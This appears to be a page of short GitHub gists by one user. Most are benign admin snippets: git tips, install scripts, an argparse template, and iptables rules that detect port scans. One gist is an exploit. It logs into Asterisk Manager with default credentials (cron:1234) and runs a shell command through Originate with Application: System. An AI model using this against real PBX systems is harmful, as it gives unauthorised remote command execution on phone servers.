droberson

Keybase proof

I hereby claim:

• I am droberson on github.
• I am droberson (https://keybase.io/droberson) on keybase.
• I have a public key whose fingerprint is 8124 9A31 8C19 7335 54E0 69E2 2D8B AC25 9AFA E810

To claim this, I am signing this object:

droberson

#!/usr/bin/env python

import argparse

def main():
    description = "example: ./argparse.py [--foo arg] [arg1 arg2]"
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument("arg1", nargs="?", help="Argument 1")
    parser.add_argument("arg2", nargs="?", help="Argument 2")
    parser.add_argument("-f", "--foo", required=False, help="foo argument")

droberson

Many PBX distros include default Asterisk Manager credentials. Vicidial uses cron:1234.
This requires a valid, registered extension to work. This example pings you. Verify with
tcpdump or Wireshark.

USER="cron"
SECRET="1234"
PROTOCOL="IAX2" # Could be SIP or something else.
EXTENSION="4000"
COMMAND="ping -c 5 10.10.10.10"
(echo "ACTION: LOGIN\r\nUSERNAME: ${USER}\r\nSECRET: ${SECRET}\r\n\r\nAction: Originate\r\nChannel: ${PROTOCOL}/${EXTENSION}\r\nExten: ${EXTENSION}\r\nPriority: 1\r\nCallerID: lol\r\nApplication: System\r\nData: ${COMMAND}\r\n\r\n") | \

droberson

This will start logging and block hosts that connect to a host quicker than 10 times in 30 seconds. This severely slows down Nmap scans against you and provides a heads up that you're being scanned by a port scanner or something like dirbuster/sqlmap/hydra that make a lot of connections in rapid succession:

iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A FORWARD -j LOGGING

iptables -A LOGGING -p tcp -i eth0 -m state --state NEW -m recent --set
iptables -A LOGGING -p tcp -i eth0 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j LOG --log-prefix "portscan: " --log-level 4

iptables -A LOGGING -j DROP

droberson

# Install OpenVAS + Greenbone Security Assistant on Ubuntu 16.04 (using openvas9 metapackage)
apt update && apt upgrade
apt install python-software-properties
apt install sqlite3
apt install software-properties-common
apt install python-software-properties
add-apt-repository ppa:mrazavi/openvas
apt-get update
apt-get install openvas9
apt install libopenvas9-dev ### if you want to develop

droberson

1. Clone your fork:

git clone git@github.com:YOUR-USERNAME/YOUR-FORKED-REPO.git

2. Add remote from original repository in your forked repository:

cd into/cloned/fork-repo
git remote add upstream git://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream

droberson

1. git checkout -b squashed_branch
2. git rebase -i master
3. edit the file:

pick aaaaaaa commit message 1
pick bbbbbbb commit message 2
pick ccccccc commit message 3
...

->

droberson

#!/usr/bin/env python3

from tempfile import mkstemp
from os import remove, fdopen

import requests

ouilist = requests.get("http://standards-oui.ieee.org/oui.txt")

tmpfd, tmpfile = mkstemp()

droberson

#!/bin/sh

LOGFILE="volatile.log"

exectee () {
        echo "[+] $@" | tee -a $LOGFILE
        $@ | tee -a $LOGFILE
        echo | tee -a $LOGFILE
}

droberson

#!/bin/sh

# install latest virtualbox and vagrant

wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -

sudo add-apt-repository "deb [arch=amd64] http://download.virtualbox.org/virtualbox/debian $(lsb_release -cs) contrib"
sudo apt update
sudo apt install -y virtualbox-6.0